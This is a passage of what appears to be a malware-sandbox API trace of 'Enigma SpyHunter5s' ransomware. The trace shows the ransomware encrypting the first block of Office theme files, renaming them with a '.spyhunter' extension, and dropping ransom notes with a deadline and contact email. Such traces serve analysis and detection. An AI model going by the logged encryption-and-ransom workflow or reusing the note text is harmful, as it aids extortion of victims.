lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248feb8*=0x2ac, lpOverlapped=0x0) returned 1 [0089.999] CloseHandle (hObject=0x15c) returned 1 [0089.999] GetProcessHeap () returned 0x2c0000 [0089.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x343cf8 | out: hHeap=0x2c0000) returned 1 [0089.999] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe58 | out: pbBuffer=0x248fe58) returned 1 [0090.000] GetProcessHeap () returned 0x2c0000 [0090.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0090.000] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x248fe50*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x248fe50*=0x30) returned 1 [0090.000] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0090.136] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 76 [0090.136] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0090.136] GetProcessHeap () returned 0x2c0000 [0090.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x37f868 [0090.136] ReadFile (in: hFile=0x178, lpBuffer=0x37f868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fe14, lpOverlapped=0x0 | out: lpBuffer=0x37f868*, lpNumberOfBytesRead=0x248fe14*=0xb20, lpOverlapped=0x0) returned 1 [0090.155] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff4e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.155] WriteFile (in: hFile=0x178, lpBuffer=0x37f868*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x248fe14, lpOverlapped=0x0 | out: lpBuffer=0x37f868*, lpNumberOfBytesWritten=0x248fe14*=0xb20, lpOverlapped=0x0) returned 1 [0090.156] GetProcessHeap () returned 0x2c0000 [0090.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37f868 | out: hHeap=0x2c0000) returned 1 [0090.156] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.156] WriteFile (in: hFile=0x178, lpBuffer=0x248fe54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fe14, lpOverlapped=0x0 | out: lpBuffer=0x248fe54*, lpNumberOfBytesWritten=0x248fe14*=0x4, lpOverlapped=0x0) returned 1 [0090.156] WriteFile (in: hFile=0x178, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fe14, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x248fe14*=0x30, lpOverlapped=0x0) returned 1 [0090.156] CloseHandle (hObject=0x178) returned 1 [0090.239] GetProcessHeap () returned 0x2c0000 [0090.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0090.239] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF.spyhunter") returned 86 [0090.239] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif.spyhunter")) returned 1 [0090.240] GetProcessHeap () returned 0x2c0000 [0090.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0090.240] GetProcessHeap () returned 0x2c0000 [0090.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0090.240] GetProcessHeap () returned 0x2c0000 [0090.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x374218 | out: hHeap=0x2c0000) returned 1 [0090.240] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0090.247] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0090.247] WriteFile (in: hFile=0x178, lpBuffer=0x248fd87*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248feb0, lpOverlapped=0x0 | out: lpBuffer=0x248fd87*, lpNumberOfBytesWritten=0x248feb0*=0x127, lpOverlapped=0x0) returned 1 [0090.248] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0090.248] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248feb0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248feb0*=0x2ac, lpOverlapped=0x0) returned 1 [0090.248] CloseHandle (hObject=0x178) returned 1 [0090.248] GetProcessHeap () returned 0x2c0000 [0090.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x354338 | out: hHeap=0x2c0000) returned 1 [0090.249] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0090.249] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0090.249] WriteFile (in: hFile=0x178, lpBuffer=0x248fd83*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248feac, lpOverlapped=0x0 | out: lpBuffer=0x248fd83*, lpNumberOfBytesWritten=0x248feac*=0x127, lpOverlapped=0x0) returned 1 [0090.250] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0090.250] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248feac, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248feac*=0x2ac, lpOverlapped=0x0) returned 1 [0090.250] CloseHandle (hObject=0x178) returned 1 [0090.250] GetProcessHeap () returned 0x2c0000 [0090.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x354908 | out: hHeap=0x2c0000) returned 1 [0090.250] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe48 | out: pbBuffer=0x248fe48) returned 1 [0090.250] GetProcessHeap () returned 0x2c0000 [0090.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0090.250] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x248fe40*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x248fe40*=0x30) returned 1 [0090.251] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0090.251] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 81 [0090.251] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0090.251] GetProcessHeap () returned 0x2c0000 [0090.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x340fe8 [0090.251] ReadFile (in: hFile=0x178, lpBuffer=0x340fe8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fe04, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesRead=0x248fe04*=0x2800, lpOverlapped=0x0) returned 1 [0090.305] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.305] WriteFile (in: hFile=0x178, lpBuffer=0x340fe8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fe04, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesWritten=0x248fe04*=0x2800, lpOverlapped=0x0) returned 1 [0090.305] GetProcessHeap () returned 0x2c0000 [0090.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340fe8 | out: hHeap=0x2c0000) returned 1 [0090.306] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.306] WriteFile (in: hFile=0x178, lpBuffer=0x248fe44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fe04, lpOverlapped=0x0 | out: lpBuffer=0x248fe44*, lpNumberOfBytesWritten=0x248fe04*=0x4, lpOverlapped=0x0) returned 1 [0090.306] WriteFile (in: hFile=0x178, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fe04, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x248fe04*=0x30, lpOverlapped=0x0) returned 1 [0090.306] CloseHandle (hObject=0x178) returned 1 [0090.307] GetProcessHeap () returned 0x2c0000 [0090.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0090.307] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.spyhunter") returned 91 [0090.307] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png.spyhunter")) returned 1 [0090.310] GetProcessHeap () returned 0x2c0000 [0090.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0090.310] GetProcessHeap () returned 0x2c0000 [0090.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0090.310] GetProcessHeap () returned 0x2c0000 [0090.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x344748 | out: hHeap=0x2c0000) returned 1 [0090.310] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe48 | out: pbBuffer=0x248fe48) returned 1 [0090.310] GetProcessHeap () returned 0x2c0000 [0090.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0090.310] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x248fe40*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x248fe40*=0x30) returned 1 [0090.310] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0090.311] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF") returned 79 [0090.311] StrStrW (lpFirst="COMPASS.INF", lpSrch=".txt") returned 0x0 [0090.311] GetProcessHeap () returned 0x2c0000 [0090.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x340fe8 [0090.311] ReadFile (in: hFile=0x178, lpBuffer=0x340fe8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fe04, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesRead=0x248fe04*=0x1e6, lpOverlapped=0x0) returned 1 [0090.312] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.312] WriteFile (in: hFile=0x178, lpBuffer=0x340fe8*, nNumberOfBytesToWrite=0x1e6, lpNumberOfBytesWritten=0x248fe04, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesWritten=0x248fe04*=0x1e6, lpOverlapped=0x0) returned 1 [0090.312] GetProcessHeap () returned 0x2c0000 [0090.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340fe8 | out: hHeap=0x2c0000) returned 1 [0090.312] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.312] WriteFile (in: hFile=0x178, lpBuffer=0x248fe44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fe04, lpOverlapped=0x0 | out: lpBuffer=0x248fe44*, lpNumberOfBytesWritten=0x248fe04*=0x4, lpOverlapped=0x0) returned 1 [0090.320] WriteFile (in: hFile=0x178, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fe04, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x248fe04*=0x30, lpOverlapped=0x0) returned 1 [0090.320] CloseHandle (hObject=0x178) returned 1 [0090.320] GetProcessHeap () returned 0x2c0000 [0090.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0090.321] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF.spyhunter") returned 89 [0090.321] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.inf.spyhunter")) returned 1 [0090.321] GetProcessHeap () returned 0x2c0000 [0090.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0090.322] GetProcessHeap () returned 0x2c0000 [0090.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0090.322] GetProcessHeap () returned 0x2c0000 [0090.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x375350 | out: hHeap=0x2c0000) returned 1 [0090.322] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe40 | out: pbBuffer=0x248fe40) returned 1 [0090.322] GetProcessHeap () returned 0x2c0000 [0090.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0090.322] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x248fe38*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x248fe38*=0x30) returned 1 [0090.322] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0090.377] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM") returned 79 [0090.377] StrStrW (lpFirst="COMPASS.ELM", lpSrch=".txt") returned 0x0 [0090.377] GetProcessHeap () returned 0x2c0000 [0090.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x376930 [0090.377] ReadFile (in: hFile=0x15c, lpBuffer=0x376930, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fdfc, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesRead=0x248fdfc*=0x2800, lpOverlapped=0x0) returned 1 [0090.384] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.385] WriteFile (in: hFile=0x15c, lpBuffer=0x376930*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fdfc, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesWritten=0x248fdfc*=0x2800, lpOverlapped=0x0) returned 1 [0090.385] GetProcessHeap () returned 0x2c0000 [0090.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x376930 | out: hHeap=0x2c0000) returned 1 [0090.385] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.385] WriteFile (in: hFile=0x15c, lpBuffer=0x248fe3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fdfc, lpOverlapped=0x0 | out: lpBuffer=0x248fe3c*, lpNumberOfBytesWritten=0x248fdfc*=0x4, lpOverlapped=0x0) returned 1 [0090.455] WriteFile (in: hFile=0x15c, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fdfc, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x248fdfc*=0x30, lpOverlapped=0x0) returned 1 [0090.456] CloseHandle (hObject=0x15c) returned 1 [0090.457] GetProcessHeap () returned 0x2c0000 [0090.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x396830 [0090.457] wnsprintfW (in: pszDest=0x396830, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM.spyhunter") returned 89 [0090.457] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.elm.spyhunter")) returned 1 [0090.458] GetProcessHeap () returned 0x2c0000 [0090.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x396830 | out: hHeap=0x2c0000) returned 1 [0090.458] GetProcessHeap () returned 0x2c0000 [0090.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0090.458] GetProcessHeap () returned 0x2c0000 [0090.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x375268 | out: hHeap=0x2c0000) returned 1 [0090.458] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0090.458] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0090.458] WriteFile (in: hFile=0x15c, lpBuffer=0x248fd73*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fe9c, lpOverlapped=0x0 | out: lpBuffer=0x248fd73*, lpNumberOfBytesWritten=0x248fe9c*=0x127, lpOverlapped=0x0) returned 1 [0090.459] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0090.459] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fe9c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fe9c*=0x2ac, lpOverlapped=0x0) returned 1 [0090.459] CloseHandle (hObject=0x15c) returned 1 [0090.460] GetProcessHeap () returned 0x2c0000 [0090.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x354ce8 | out: hHeap=0x2c0000) returned 1 [0090.460] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe38 | out: pbBuffer=0x248fe38) returned 1 [0090.460] GetProcessHeap () returned 0x2c0000 [0090.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0090.460] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x248fe30*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x248fe30*=0x30) returned 1 [0090.460] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0090.461] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 81 [0090.461] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0090.461] GetProcessHeap () returned 0x2c0000 [0090.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x376930 [0090.461] ReadFile (in: hFile=0x15c, lpBuffer=0x376930, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fdf4, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesRead=0x248fdf4*=0x2800, lpOverlapped=0x0) returned 1 [0090.463] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 